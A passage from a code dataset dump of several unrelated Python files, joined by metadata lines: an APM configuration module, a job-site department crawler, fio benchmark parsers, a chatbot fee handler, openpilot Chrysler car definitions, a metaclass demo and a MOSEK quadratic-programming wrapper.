name(self):\n return \"Python\"\n\n def has_config(self, key):\n return key in SCOUT_PYTHON_VALUES\n\n def value(self, key):\n return SCOUT_PYTHON_VALUES[key]\n\n\nclass ScoutConfigEnv(object):\n \"\"\"\n Reads configuration from environment by prefixing the key\n requested with \"SCOUT_\"\n\n Example: the `log_level` config looks for SCOUT_LOG_LEVEL\n environment variable\n \"\"\"\n\n def name(self):\n return \"ENV\"\n\n def has_config(self, key):\n env_key = self.modify_key(key)\n return env_key in os.environ\n\n def value(self, key):\n env_key = self.modify_key(key)\n return os.environ[env_key]\n\n def modify_key(self, key):\n env_key = (\"SCOUT_\" + key).upper()\n return env_key\n\n\nclass ScoutConfigDerived(object):\n \"\"\"\n A configuration overlay that calculates from other values.\n \"\"\"\n\n def __init__(self, config):\n \"\"\"\n config argument is the overall ScoutConfig var, so we can lookup the\n components of the derived info.\n \"\"\"\n self.config = config\n\n def name(self):\n return \"Derived\"\n\n def has_config(self, key):\n return self.lookup_func(key) is not None\n\n def value(self, key):\n return self.lookup_func(key)()\n\n def lookup_func(self, key):\n \"\"\"\n Returns the
 derive_{key} function, or None if it isn't defined\n \"\"\"\n func_name = \"derive_\" + key\n return getattr(self, func_name, None)\n\n def derive_socket_path(self):\n return \"{}/{}/core-agent.sock\".format(\n self.config.value(\"core_agent_dir\"),\n self.config.value(\"core_agent_full_name\"),\n )\n\n def derive_core_agent_full_name(self):\n return \"{name}-{version}-{triple}\".format(\n name=\"scout_apm_core\",\n version=self.config.value(\"core_agent_version\"),\n triple=self.config.value(\"core_agent_triple\"),\n )\n\n def derive_core_agent_triple(self):\n return PlatformDetection.get_triple()\n\n\nclass ScoutConfigDefaults(object):\n \"\"\"\n Provides default values for important configurations\n \"\"\"\n\n def name(self):\n return \"Defaults\"\n\n def __init__(self):\n self.defaults = {\n \"app_server\": \"\",\n \"application_root\": \"\",\n \"core_agent_dir\": \"/tmp/scout_apm_core\",\n \"core_agent_download\": True,\n \"core_agent_launch\": True,\n \"core_agent_permissions\": 700,\n \"core_agent_version\": \"v1.1.8\", # can be an exact tag name, or 'latest'\n \"disabled_instruments\": [],\n \"download_url\": \"https://s3-us-west-1.amazonaws.com/scout-public-downloads/apm_core_agent/release\", # noqa: E501\n \"framework\": \"\",\n \"framework_version\": \"\",\n \"hostname\": \"\",\n \"key\": \"\",\n \"log_level\": \"info\",\n \"monitor\": False,\n \"name\": \"\",\n \"revision_sha\": GitRevision().detect(),\n \"scm_subdirectory\": \"\",\n }\n\n def has_config(self, key):\n return key in self.defaults\n\n def value(self, key):\n return self.defaults[key]\n\n\n# Always returns None to any key\nclass ScoutConfigNull(object):\n \"\"\"\n Always answers that a key is present, but the value is None\n\n Used as the last step of the layered configuration.\n \"\"\"\n\n def name(self):\n return \"Null\"\n\n def has_config(self, key):\n return True\n\n def value(self, key):\n return None\n\n\nstring_type = str if sys.version_info[0] >= 3 else basestring # noqa: F821\n\n\nclass BooleanConversion(object):\n @classmethod\n def convert(cls, value):\n if isinstance(value, bool):\n return value\n if isinstance(value, string_type):\n return value.lower() in (\"yes\", \"true\", \"t\", \"1\")\n # Unknown type - default to false?\n return False\n\n\nclass ListConversion(object):\n @classmethod\n def convert(cls, value):\n if isinstance(value, list):\n return value\n if isinstance(value, tuple):\n return list(value)\n if isinstance(value, string_type):\n # Split on commas\n return [item.strip() for item in value.split(\",\") if item]\n # Unknown type - default to empty?\n return []\n\n\nCONVERSIONS = {\n \"core_agent_download\": BooleanConversion,\n \"core_agent_launch\": BooleanConversion,\n \"monitor\": BooleanConversion,\n \"disabled_instruments\": ListConversion,\n \"ignore\": ListConversion,\n}\n
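\n# Illustrative usage of the layered lookup:\n# ScoutConfig.set(monitor=\"true\") # stored in the Python layer\n# ScoutConfig().value(\"monitor\") # -> True via BooleanConversion, unless SCOUT_MONITOR is set in ENV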
","repo_name":"DheerajS777/Sample-Json-app","sub_path":"vdemo/lib/python3.6/site-packages/scout_apm/core/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":7909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"15559186494","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom random import random\nfrom time import sleep\nfrom funs import *\n\nheaders = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'}\nurl = 'https://www.104.com.tw/jb/career/department/navigation?browser=1&degree=3&sid=5003000000'\n\n\n# Get index to every dept.\nresponse = requests.get(url, headers=headers)\nresponse.encoding = 'utf-8'\nhtml = response.text\n\ndom = BeautifulSoup(html, 'html.parser')\nlinks = dom.find_all('a', class_='a2')\n\n# Get links to all dept.\ndept_links = []\nfor link in links:\n dept = link.text\n href = 'https://www.104.com.tw' + link['href']\n dept_links.append((dept, href))\n\n\n# Crawl and save data\nwith open('dept_info.csv', 'w', encoding='utf-8') as f:\n f.write('dept,直接升學,先工作後升學,不再進修,師生比\\n')\ncount = 0\nfor dept, url in dept_links:\n print('Parsing', dept, '...', count)\n parse_dept(dept, url, headers)\n count += 1\n print('Sleep for 0.5-1.5 sec')\n sleep(0.5 + random())\n\n","repo_name":"liao961120/SNA","sub_path":"final_project/104Crawl/crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"13895279011","text":"import sys\nimport getopt\nimport operator\n\nfrom parse_stat import *\n\ndef usage():\n print(\"Usage %s [-i|-o|-h] [--help|--input|--output]\" % sys.argv[0])\n\n\ndef filter_stats_by_rwmixread(stats, f):\n seen = set()\n stats = [stat for stat in filter(f, stats) if not (stat.rwmixread in seen or seen.add(stat.rwmixread))]\n stats.sort(key=lambda stat: stat.rwmixread, reverse=True)\n return stats\n\ndef main():\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"hi:o:\", [\"help\", \"input=\", \"output=\"])\n except getopt.GetoptError as err:\n print(str(err))\n usage()\n sys.exit(2)\n\n inputs = []\n output = \"./output\"\n for opt, arg in opts:\n if opt in (\"-h\", \"--help\"):\n usage()\n sys.exit(1)\n elif opt in (\"-i\", \"--input\"):\n inputs.append(arg)\n elif opt in (\"-o\", \"--output\"):\n output = arg\n \n iodepts = [1, 2, 4, 8, 16, 32]\n\n lats = []\n for log_dir in inputs:\n stats = parse_dir(log_dir, lambda stat: True)\n\n lats.append(stats)\n\n\n # Define customized filter here\n rwmixreads = [100, 90, 80, 70, 60, 50]\n def f(stat):\n return stat.bs == \"4k\" and stat.rwmixread in rwmixreads and stat.iodepth == 32\n\n with Output(output, \"mix-read-bandwidth\") as f:\n f.write_head(\"label,100%,90%,80%,70%,60%,50%\") \n\n\n for stats in lats:\n stats = filter_stats_by_rwmixread(stats, \n lambda stat: stat.bs == \"4k\" and stat.rwmixread in rwmixreads and stat.iodepth == 32)\n if len(stats) == 0:\n continue\n\n disk_name = stats[0].disk_name\n f.write_stats(\"%s-Reads\" % disk_name, stats, lambda stat: \"%.1f\" % (stat.read.bw))\n f.write_stats(\"%s-Writes\" % disk_name, stats, lambda stat: \"%.1f\" % (stat.write.bw))\n f.write_stats(\"%s-Combines\" % disk_name, stats, lambda stat: \"%.1f\" % (stat.read.bw + stat.write.bw))\n\n with Output(output, \"mix-read-var-write-bandwidth\") as f:\n f.write_head(\"label,100%,90%,80%,70%,60%,50%\") \n\n\n for stats in lats:\n stats = filter_stats_by_rwmixread(stats, \n lambda stat: stat.bs == \"4k\" and stat.rwmixread in rwmixreads and stat.iodepth == 32)\n if len(stats) == 0:\n continue\n\n f.write_stats(\"%s-4KB Write\" % stats[0].disk_name, stats, lambda stat: \"%.1f\" % (stat.read.bw + stat.write.bw))\n \n for stats in lats:\n stats = filter_stats_by_rwmixread(stats, \n lambda stat: stat.bs == \"4k,128k\" and stat.rwmixread in rwmixreads and stat.iodepth == 32)\n if len(stats) == 0:\n continue\n\n f.write_stats(\"%s-128KB Write\" % stats[0].disk_name, stats, lambda stat: \"%.1f\" % (stat.read.bw + stat.write.bw))\n \n \n\nif __name__ == \"__main__\":\n
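 # Parse the fio rwmixread logs from every --input directory and write the bandwidth CSV summaries.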
main()","repo_name":"siddontang/fio-helper","sub_path":"parse_rwmixread_bw.py","file_name":"parse_rwmixread_bw.py","file_ext":"py","file_size_in_byte":2863,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"27"}
+{"seq_id":"1007074666","text":"from pydialogflow_fulfillment import DialogflowResponse\nfrom pydialogflow_fulfillment import SimpleResponse, Confirmation, OutputContexts, Suggestions\nimport json\n\nCONTEXT_ASK_PROGRAMME = \"GetGraduateProgrammeFee-followup\"\n\nDATA_FILE = \"data/GetGraduateProgrammeFee.json\"\n\nwith open(DATA_FILE, 'r') as infile:\n    data = json.load(infile)\n\ndef has_params(theKey, params):\n    return theKey in params and params[theKey] != \"\"\n\ndef askProgramme(req):\n    res = DialogflowResponse(\"What is the graduate programme you are looking at?\")\n    res.add(OutputContexts(req.get_project_id(), req.get_session_id(),CONTEXT_ASK_PROGRAMME,5,req.get_paramters()))\n    return res.get_final_response()\ndef askApplicationGroup(req):\n    res = DialogflowResponse(\"Are you Singapore/PR or Non Singaporean?\")\n    res.add(OutputContexts(req.get_project_id(), req.get_session_id(),CONTEXT_ASK_PROGRAMME,5,req.get_paramters()))\n    return res.get_final_response()\ndef process(req):\n    params = req.get_paramters()\n    try:\n        for con in req.get_ouputcontext_list():\n            o_params = con[\"parameters\"]\n            for x in o_params:\n                params[x] = o_params[x]\n    except Exception:\n        pass  # the request may carry no output contexts\n\n    print(params)\n    if not has_params(\"graduate-programme\", params):\n        return askProgramme(req)\n    \n    if not has_params(\"application-group\", params):\n        return askApplicationGroup(req)\n    application_group = \"\" if \"application-group\" not in params else params[\"application-group\"] \n    graduate_programme = \"\" if \"graduate-programme\" not in params else params[\"graduate-programme\"]\n\n    result = [item[\"answer\"] for item in data \n            if item[\"graduate-programme\"] == graduate_programme \n            and item[\"application-group\"] == application_group]\n\n    if len(result) == 0:\n        return DialogflowResponse(\"Unknown programme {0}\".format(graduate_programme)).get_final_response()\n    return DialogflowResponse(\"The programme fee is {0}\".format(result[0])).get_final_response()","repo_name":"musicrokr/IRS-CS-2019-03-09-IS01PT-GRP-TheSundayLunatics-ISSAC","sub_path":"SystemCode/issac-backend/GetGraduateProgrammeFee.py","file_name":"GetGraduateProgrammeFee.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"}
+{"seq_id":"34903579132","text":"from enum import IntFlag, StrEnum\nfrom dataclasses import dataclass, field\nfrom typing import Dict, List, Optional, Union\n\nfrom cereal import car\nfrom panda.python import uds\nfrom openpilot.selfdrive.car import dbc_dict\nfrom openpilot.selfdrive.car.docs_definitions import CarHarness, CarInfo, CarParts\nfrom openpilot.selfdrive.car.fw_query_definitions import FwQueryConfig, Request, p16\n\nEcu = car.CarParams.Ecu\n\n\nclass ChryslerFlags(IntFlag):\n  HIGHER_MIN_STEERING_SPEED = 1\n\n\nclass CAR(StrEnum):\n  # Chrysler\n  PACIFICA_2017_HYBRID = \"CHRYSLER PACIFICA HYBRID 2017\"\n  PACIFICA_2018_HYBRID = \"CHRYSLER PACIFICA HYBRID 2018\"\n  PACIFICA_2019_HYBRID = \"CHRYSLER PACIFICA HYBRID 2019\"\n  PACIFICA_2018 = \"CHRYSLER PACIFICA 2018\"\n  PACIFICA_2020 = \"CHRYSLER PACIFICA 2020\"\n\n  # Jeep\n  JEEP_GRAND_CHEROKEE = \"JEEP GRAND CHEROKEE V6 2018\" # includes 2017 Trailhawk\n  JEEP_GRAND_CHEROKEE_2019 = \"JEEP GRAND CHEROKEE 2019\" # includes 2020 Trailhawk\n\n  # Ram\n  
RAM_1500 = \"RAM 1500 5TH GEN\"\n RAM_HD = \"RAM HD 5TH GEN\"\n\n\nclass CarControllerParams:\n def __init__(self, CP):\n self.STEER_STEP = 2 # 50 Hz\n self.STEER_ERROR_MAX = 80\n if CP.carFingerprint in RAM_HD:\n self.STEER_DELTA_UP = 14\n self.STEER_DELTA_DOWN = 14\n self.STEER_MAX = 361 # higher than this faults the EPS\n elif CP.carFingerprint in RAM_DT:\n self.STEER_DELTA_UP = 6\n self.STEER_DELTA_DOWN = 6\n self.STEER_MAX = 261 # EPS allows more, up to 350?\n else:\n self.STEER_DELTA_UP = 3\n self.STEER_DELTA_DOWN = 3\n self.STEER_MAX = 261 # higher than this faults the EPS\n\n\nSTEER_THRESHOLD = 120\n\nRAM_DT = {CAR.RAM_1500, }\nRAM_HD = {CAR.RAM_HD, }\nRAM_CARS = RAM_DT | RAM_HD\n\n\n@dataclass\nclass ChryslerCarInfo(CarInfo):\n package: str = \"Adaptive Cruise Control (ACC)\"\n car_parts: CarParts = field(default_factory=CarParts.common([CarHarness.fca]))\n\n\nCAR_INFO: Dict[str, Optional[Union[ChryslerCarInfo, List[ChryslerCarInfo]]]] = {\n CAR.PACIFICA_2017_HYBRID: ChryslerCarInfo(\"Chrysler Pacifica Hybrid 2017-18\"),\n CAR.PACIFICA_2018_HYBRID: None, # same platforms\n CAR.PACIFICA_2019_HYBRID: ChryslerCarInfo(\"Chrysler Pacifica Hybrid 2019-23\"),\n CAR.PACIFICA_2018: ChryslerCarInfo(\"Chrysler Pacifica 2017-18\"),\n CAR.PACIFICA_2020: [\n ChryslerCarInfo(\"Chrysler Pacifica 2019-20\"),\n ChryslerCarInfo(\"Chrysler Pacifica 2021\", package=\"All\"),\n ],\n CAR.JEEP_GRAND_CHEROKEE: ChryslerCarInfo(\"Jeep Grand Cherokee 2016-18\", video_link=\"https://www.youtube.com/watch?v=eLR9o2JkuRk\"),\n CAR.JEEP_GRAND_CHEROKEE_2019: ChryslerCarInfo(\"Jeep Grand Cherokee 2019-21\", video_link=\"https://www.youtube.com/watch?v=jBe4lWnRSu4\"),\n CAR.RAM_1500: ChryslerCarInfo(\"Ram 1500 2019-23\", car_parts=CarParts.common([CarHarness.ram])),\n CAR.RAM_HD: [\n ChryslerCarInfo(\"Ram 2500 2020-24\", car_parts=CarParts.common([CarHarness.ram])),\n ChryslerCarInfo(\"Ram 3500 2019-22\", car_parts=CarParts.common([CarHarness.ram])),\n ],\n}\n\n\nCHRYSLER_VERSION_REQUEST = bytes([uds.SERVICE_TYPE.READ_DATA_BY_IDENTIFIER]) + \\\n p16(0xf132)\nCHRYSLER_VERSION_RESPONSE = bytes([uds.SERVICE_TYPE.READ_DATA_BY_IDENTIFIER + 0x40]) + \\\n p16(0xf132)\n\nCHRYSLER_SOFTWARE_VERSION_REQUEST = bytes([uds.SERVICE_TYPE.READ_DATA_BY_IDENTIFIER]) + \\\n p16(uds.DATA_IDENTIFIER_TYPE.SYSTEM_SUPPLIER_ECU_SOFTWARE_NUMBER)\nCHRYSLER_SOFTWARE_VERSION_RESPONSE = bytes([uds.SERVICE_TYPE.READ_DATA_BY_IDENTIFIER + 0x40]) + \\\n p16(uds.DATA_IDENTIFIER_TYPE.SYSTEM_SUPPLIER_ECU_SOFTWARE_NUMBER)\n\nCHRYSLER_RX_OFFSET = -0x280\n\nFW_QUERY_CONFIG = FwQueryConfig(\n requests=[\n Request(\n [CHRYSLER_VERSION_REQUEST],\n [CHRYSLER_VERSION_RESPONSE],\n whitelist_ecus=[Ecu.abs, Ecu.eps, Ecu.srs, Ecu.fwdRadar, Ecu.fwdCamera, Ecu.combinationMeter],\n rx_offset=CHRYSLER_RX_OFFSET,\n bus=0,\n ),\n Request(\n [CHRYSLER_VERSION_REQUEST],\n [CHRYSLER_VERSION_RESPONSE],\n whitelist_ecus=[Ecu.abs, Ecu.hybrid, Ecu.engine, Ecu.transmission],\n bus=0,\n ),\n Request(\n [CHRYSLER_SOFTWARE_VERSION_REQUEST],\n [CHRYSLER_SOFTWARE_VERSION_RESPONSE],\n whitelist_ecus=[Ecu.engine, Ecu.transmission],\n bus=0,\n ),\n ],\n extra_ecus=[\n (Ecu.hybrid, 0x7e2, None), # manages transmission on hybrids\n (Ecu.abs, 0x7e4, None), # alt address for abs on hybrids\n ],\n)\n\n\nDBC = {\n CAR.PACIFICA_2017_HYBRID: dbc_dict('chrysler_pacifica_2017_hybrid_generated', 'chrysler_pacifica_2017_hybrid_private_fusion'),\n CAR.PACIFICA_2018: dbc_dict('chrysler_pacifica_2017_hybrid_generated', 'chrysler_pacifica_2017_hybrid_private_fusion'),\n CAR.PACIFICA_2020: 
dbc_dict('chrysler_pacifica_2017_hybrid_generated', 'chrysler_pacifica_2017_hybrid_private_fusion'),\n  CAR.PACIFICA_2018_HYBRID: dbc_dict('chrysler_pacifica_2017_hybrid_generated', 'chrysler_pacifica_2017_hybrid_private_fusion'),\n  CAR.PACIFICA_2019_HYBRID: dbc_dict('chrysler_pacifica_2017_hybrid_generated', 'chrysler_pacifica_2017_hybrid_private_fusion'),\n  CAR.JEEP_GRAND_CHEROKEE: dbc_dict('chrysler_pacifica_2017_hybrid_generated', 'chrysler_pacifica_2017_hybrid_private_fusion'),\n  CAR.JEEP_GRAND_CHEROKEE_2019: dbc_dict('chrysler_pacifica_2017_hybrid_generated', 'chrysler_pacifica_2017_hybrid_private_fusion'),\n  CAR.RAM_1500: dbc_dict('chrysler_ram_dt_generated', None),\n  CAR.RAM_HD: dbc_dict('chrysler_ram_hd_generated', None),\n}\n","repo_name":"neokii/glidepilot","sub_path":"selfdrive/car/chrysler/values.py","file_name":"values.py","file_ext":"py","file_size_in_byte":5300,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"27"}
+{"seq_id":"28529355058","text":"def solution(amountText):\n    answer = True\n    if amountText.startswith(',') or amountText.endswith(','):\n        return False\n    splitted = amountText.split(',')\n    if splitted[0].startswith('0'): return False\n    for i in range(len(splitted)):\n        if i > 0 and len(splitted[i]) != 3 :\n            return False\n        if not splitted[i].isdigit():\n            return False\n\n    return answer\n\nprint(solution('01,001,009'))","repo_name":"su-ram/Problem-Solving","sub_path":"프로그래머스/토스_Q3.py","file_name":"토스_Q3.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"6321086275","text":"import types\r\nimport inspect\r\nfrom Chat import Chat\r\nfrom Item import Item\r\n\r\nSaveObjMembers = {\r\n    \"Chat\" : Chat,\r\n    \"Item\" : Item,\r\n}\r\n\r\nclass MetaClass(type):\r\n    _class_filter_list = ('__module__', '__doc__')\r\n    \r\n    def __init__(cls, name, bases, dic):\r\n        super().__init__(name, bases, dic)\r\n        print(\"MetaClass init\",cls)\r\n        funset = set()\r\n        # process the member classes' functions\r\n        for memClsName, memCls in SaveObjMembers.items():\r\n            print(\"out funcName:\",memClsName, memCls)\r\n            print(\"member:\",inspect.getmembers(memCls))\r\n            print(\"member:\",inspect.getmembers(memCls, inspect.isfunction))\r\n            for funcName, func in inspect.getmembers(memCls, inspect.isfunction):\r\n                print(\"in funcName\")\r\n                if funcName in ('__init__', '__new__', '__call__', '__setattr__', '__str__'):\r\n                    continue\r\n                if funcName in funset:\r\n                    raise Exception('got duplicate method name: %s, %s' % (memCls.__name__, funcName))\r\n                funset.add(funcName)\r\n                print(\"funcName:\",funcName)\r\n                setattr(cls, funcName, func)\r\n            \r\n            for membName, memb in inspect.getmembers(memCls):\r\n                if membName in MetaClass._class_filter_list:\r\n                    continue\r\n\r\n                if isinstance(memb, int) or \\\r\n                    isinstance(memb, str) or\\\r\n                    isinstance(memb, bytes) or \\\r\n                    isinstance(memb, list) or \\\r\n                    isinstance(memb, dict) or \\\r\n                    isinstance(memb, tuple) or \\\r\n                    isinstance(memb, float) or \\\r\n                    isinstance(memb, set) or \\\r\n                    isinstance(memb, frozenset):\r\n                    # check whether the attribute name is duplicated\r\n                    if hasattr(cls, membName):\r\n                        raise Exception('got duplicate attr name: %s, %s' % (memCls.__name__, membName))\r\n                    # set the attribute value\r\n                    setattr(cls, membName, memb)\r\n","repo_name":"techxiaofei/cpp-practice","sub_path":"metaclass/MetaClass.py","file_name":"MetaClass.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"}
+{"seq_id":"25208716838","text":"import sys\nimport mosek\nimport mosek_g\n# Since the actual value of Infinity is ignored, we define it solely\n# for symbolic purposes:\n\n\nclass mosek_quadraticp(object):\n\n\tdef __init__(self, params):\n\t\tparams = mosek_g.params_init(params)\n\t\tself._INF = mosek_g.INF\n\t\tself.C_obj = params['C_obj']\n\t\tself.Q_obj = params.get('Q_obj', None)\n\t\tself.A_con = params.get('A_con', None)\n\t\t# transpose to column-major form; default to no linear constraints\n\t\tself.A_con = list(map(list, zip(*self.A_con))) if self.A_con else []\n\t\tself.Q_con = params.get('Q_con', None)\n\t\tself.buc = params.get('buc', None)\n\t\tself.blc = params.get('blc', None)\n\t\tself.bux = params.get('bux', None)\n\t\tself.blx = params.get('blx', None)\n\t\tself.initial = params.get('initial', None)\n\t\tself.minimize = params.get('minimize', True)\n\t\tself.integ_index = params.get('integ_index', [])\n\t\tself.silent = params.get('silent', True)\n\t\tself.bkc = []\n\t\tself.bkx = []\n\t\tself.asub = []\n\t\tself.aval = []\n\t\tself.numcon = len(self.buc)\n\t\tself.numvar = len(self.bux)\n\t\tself.max_time = params.get('max_time', 60)\n\t\tself.qsubi = []\n\t\tself.qsubj = []\n\t\tself.qval = []\n\t\tself.result = {\"x\": None, \"opti\": None, \"msg\": \"Not finished yet.\", \"code\":-1}\n\n\tdef streamprinter(self, text):\n\t    sys.stdout.write(text)\n\t    sys.stdout.flush()\n\n\tdef fit(self, ):\n\t\twith mosek.Env() as env:\n\t\t\twith env.Task(0, 0) as task:\n\t\t\t\tif self.silent is False:\n\t\t\t\t\ttask.set_Stream(mosek.streamtype.log, self.streamprinter)\n\t\t\t\t# MOSEK bound keys: fr=free, lo=lower only, fx=fixed, ra=range, up=upper only.\n\t\t\t\t# The equality (fx) case is tested before the generic range case so it is reachable.\n\t\t\t\tfor i, j in zip(self.blc, self.buc):\n\t\t\t\t\tif i <= -self._INF and j >= self._INF:\n\t\t\t\t\t\tself.bkc.append(mosek.boundkey.fr)\n\t\t\t\t\telif i > -self._INF and j >= self._INF:\n\t\t\t\t\t\tself.bkc.append(mosek.boundkey.lo)\n\t\t\t\t\telif i == j and i > -self._INF and j < self._INF:\n\t\t\t\t\t\tself.bkc.append(mosek.boundkey.fx)\n\t\t\t\t\telif i > -self._INF and j < self._INF:\n\t\t\t\t\t\tself.bkc.append(mosek.boundkey.ra)\n\t\t\t\t\telif i <= -self._INF and j < self._INF:\n\t\t\t\t\t\tself.bkc.append(mosek.boundkey.up)\n\t\t\t\tfor i, j in zip(self.blx, self.bux):\n\t\t\t\t\tif i <= -self._INF and j >= self._INF:\n\t\t\t\t\t\tself.bkx.append(mosek.boundkey.fr)\n\t\t\t\t\telif i > -self._INF and j >= self._INF:\n\t\t\t\t\t\tself.bkx.append(mosek.boundkey.lo)\n\t\t\t\t\telif i == j and i > -self._INF and j < self._INF:\n\t\t\t\t\t\tself.bkx.append(mosek.boundkey.fx)\n\t\t\t\t\telif i > -self._INF and j < self._INF:\n\t\t\t\t\t\tself.bkx.append(mosek.boundkey.ra)\n\t\t\t\t\telif i <= -self._INF and j < self._INF:\n\t\t\t\t\t\tself.bkx.append(mosek.boundkey.up)\n\t\t\t\tif len(self.A_con) > 0:\n\t\t\t\t\tfor A_vec in self.A_con:\n\t\t\t\t\t\tasub_tmp = []\n\t\t\t\t\t\taval_tmp = []\n\t\t\t\t\t\tfor i, elm in enumerate(A_vec):\n\t\t\t\t\t\t\tif elm != 0:\n\t\t\t\t\t\t\t\tasub_tmp.append(i)\n\t\t\t\t\t\t\t\taval_tmp.append(float(elm))\n\t\t\t\t\t\tself.asub.append(asub_tmp)\n\t\t\t\t\t\tself.aval.append(aval_tmp)\n\n\t\t\t\ttask.appendcons(self.numcon)\n\t\t\t\ttask.appendvars(self.numvar)\n\t\t\t\tfor i in range(self.numvar):\n\t\t\t\t\t# Set the linear term c_i in the objective.\n\t\t\t\t\ttask.putcj(i, self.C_obj[i])\n\n\t\t\t\t\t# Set the bounds on variable i\n\t\t\t\t\t# blx[i] <= x_i <= bux[i]\n\t\t\t\t\n\t\t\t\t\ttask.putbound(mosek.accmode.var, i, self.bkx[i], self.blx[i], self.bux[i])\n\n\t\t\t\t\t\n\t\t\t\t\t# Input column i of A\n\t\t\t\t\t\n\t\t\t\t\tif len(self.A_con) > 0:\n\t\t\t\t\t\ttask.putacol(i, self.asub[i], self.aval[i])\n\t\t\t\tif self.numcon>0:\n\t\t\t\t\tfor i 
in range(self.numcon):\n\t\t\t\t\t    task.putbound(mosek.accmode.con, i, self.bkc[i], self.blc[i], self.buc[i])\n\n\t\t\t\t# Set up and input quadratic objective\n\t\t\t\tself.qsubi = []\n\t\t\t\tself.qsubj = []\n\t\t\t\tself.qval = []\n\t\t\t\tif self.Q_obj:\n\t\t\t\t\tfor i in range(0, self.numvar):\n\t\t\t\t\t\tfor j in range(0, i + 1):\n\t\t\t\t\t\t\tif abs(self.Q_obj[i][j]) >= mosek_g.EPS:\n\t\t\t\t\t\t\t\tself.qsubi.append(i)\n\t\t\t\t\t\t\t\tself.qsubj.append(j)\n\t\t\t\t\t\t\t\tself.qval.append(self.Q_obj[i][j])\n\t\t\t\t\ttask.putqobj(self.qsubi, self.qsubj, self.qval)\n\t\t\t\tfor k in range(0, self.numcon):\n\t\t\t\t\tif self.Q_con is None or len(self.Q_con) == 0:\n\t\t\t\t\t\tbreak\n\t\t\t\t\tQ_con_k = self.Q_con[k]\n\t\t\t\t\tif Q_con_k is None or len(Q_con_k)==0:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tself.qsubi = []\n\t\t\t\t\tself.qsubj = []\n\t\t\t\t\tself.qval = []\n\t\t\t\t\tfor i in range(0, len(Q_con_k)):\n\t\t\t\t\t\tfor j in range(0, i + 1):\n\t\t\t\t\t\t\tif abs(Q_con_k[i][j]) >= mosek_g.EPS:\n\t\t\t\t\t\t\t\tself.qsubi.append(i)\n\t\t\t\t\t\t\t\tself.qsubj.append(j)\n\t\t\t\t\t\t\t\tself.qval.append(Q_con_k[i][j])\n\t\t\t\t\ttask.putqconk(k, self.qsubi, self.qsubj, self.qval)\n\n\n\t\t\t\tif self.minimize is True:\n\t\t\t\t    task.putobjsense(mosek.objsense.minimize)\n\t\t\t\telse:\n\t\t\t\t    task.putobjsense(mosek.objsense.maximize)\n\t\t\t\t\n\t\t\t\ttask.optimize()\n\n\t\t\t\ttask.solutionsummary(mosek.streamtype.msg)\n\t\t\t\tprosta = task.getprosta(mosek.soltype.itr)\n\t\t\t\tsolsta = task.getsolsta(mosek.soltype.itr)\n\n\t\t\t\tif solsta == mosek.solsta.optimal or solsta == mosek.solsta.near_optimal:\n\t\t\t\t\tself.result[\"x\"] = [0.] * self.numvar\n\t\t\t\t\ttask.getxx(mosek.soltype.itr, self.result[\"x\"])\n\t\t\t\t\tself.result[\"opti\"] = task.getprimalobj(mosek.soltype.itr)\n\t\t\t\t\tself.result[\"code\"] = 0\n\t\t\t\t\tself.result[\"msg\"] = \"Optimal solution\"\n\t\t\t\telif solsta == mosek.solsta.dual_infeas_cer:\n\t\t\t\t\tself.result[\"msg\"] = \"Primal or dual infeasibility.\\n\"\n\t\t\t\telif solsta == mosek.solsta.prim_infeas_cer:\n\t\t\t\t\tself.result[\"msg\"] = \"Primal or dual infeasibility.\\n\"\n\t\t\t\telif solsta == mosek.solsta.near_dual_infeas_cer:\n\t\t\t\t\tself.result[\"msg\"] = \"Primal or dual infeasibility.\\n\"\n\t\t\t\telif solsta == mosek.solsta.near_prim_infeas_cer:\n\t\t\t\t\tself.result[\"msg\"] = \"Primal or dual infeasibility.\\n\"\n\t\t\t\telif solsta == mosek.solsta.unknown:\n\t\t\t\t\tself.result[\"msg\"] = \"Unknown solution status\"\n\t\t\t\telse:\n\t\t\t\t\tself.result[\"msg\"] = \"Other solution status\"\n\t\t\t\tprint(self.result[\"msg\"])\n\t\t\t\treturn self.result[\"code\"], self.result\n\n\ndef main():\n\tans = \"[0.4488485199618974, 0.9319361480448437, 0.6741131920778094]\"  # expected optimum, kept for reference\n\n\n\tQ_obj = [[2, 0, -1], [0, 0.2, 0], [-1, 0, 2]]\n\tQ_con_0 = [[-2, 0, 0.2], [0, -2, 0], [0.2, 0, -0.2]]\n\tQ_con = [Q_con_0]\n\n\tparams = {\"C_obj\" : [0, -1, 0],\n  \t\t   \"Q_obj\" : Q_obj,\n           \"A_con\" : [[1, 1, 1]],\n           \"Q_con\" : Q_con,\n           \"blc\" : [1],\n           \"buc\" : [mosek_g.INF],\n           \"blx\" : [0, 0, 0],\n           \"bux\" : [mosek_g.INF, mosek_g.INF, mosek_g.INF],\n           \"minimize\" :True,\n           \"silent\": True\n           }\n
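\t# Note (a hand-worked reading, since MOSEK applies an implicit 1/2 factor to Q):\n\t# with these matrices the problem is essentially MOSEK's qcqo1 sample,\n\t#     minimize  x1^2 + 0.1*x2^2 + x3^2 - x1*x3 - x2\n\t#     subject to x1 + x2 + x3 >= 1,  x >= 0,\n\t# plus one quadratic constraint built from Q_con_0.\n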
